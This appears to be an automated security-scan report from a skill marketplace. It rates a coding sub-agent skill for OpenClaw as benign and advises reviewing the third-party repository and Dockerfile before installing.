Skillv0.1.3

ClawScan security

Coder for OpenClaw · ClawHub's context-aware review of the artifact, metadata, and declared behavior.

Scanner verdict

BenignMar 8, 2026, 9:07 PM

Verdict: benign
Confidence: high
Model: gpt-5-mini
Summary: The skill is internally consistent with its stated purpose (wiring a coding sub-agent for OpenClaw) and asks for tools and config that match that purpose, but installing it requires you to pull and build code from a third‑party GitHub repo so you should review the repo and Dockerfile before proceeding.
Guidance: This skill appears to do what it says, but installation requires cloning and building a third-party GitHub repo and its Docker image. Before installing: review the repository (especially Dockerfile, workspace-coder/SOUL.md, and agent-config.template.json) for unexpected actions; ensure Docker builds occur in an isolated environment if you don't fully trust the source; confirm you are comfortable granting the OpenClaw openai-codex provider profile access to this sub-agent (usage/costs and API access); back up your openclaw.json before registering the new agent; and run the provided smoke tests in a safe sandbox first.

Review Dimensions

Purpose & Capability: okName, description, required binaries (openclaw, docker, git), and required OpenClaw config/provider profile align with the stated goal of installing a coding-focused OpenClaw sub-agent. The listed actions (copy workspace-coder, register agent, build sandbox image) are expected for this capability.
Instruction Scope: noteRuntime instructions are limited to cloning the listed GitHub repo, copying agent files into your OpenClaw directory, building a Docker sandbox image, and registering the agent in openclaw.json. They do not request unrelated system files or credentials. However, the instructions do require building and running third‑party code (the Docker image and workspace contents), so you should inspect the repository and SOUL/agent files before installing.
Install Mechanism: noteNo automated install spec is provided; installation is instruction-driven via git clone and docker build from a GitHub repo. GitHub is a common host (expected), but building a Docker image from remote source can execute arbitrary code during build — review the Dockerfile and repo before building.
Credentials: okThe skill requests no new environment variables itself. It does require an authenticated openai-codex provider profile in OpenClaw (expected for a coding LLM sub-agent). Be aware the sub-agent will use whatever provider credentials are present in OpenClaw (possible usage/cost implications and access to provider APIs).
Persistence & Privilege: okThe skill is not always:true and is user-invocable; it will register an agent in openclaw.json (expected behavior for adding a sub-agent). There is no indication it modifies other skills or system-wide agent settings beyond registering itself.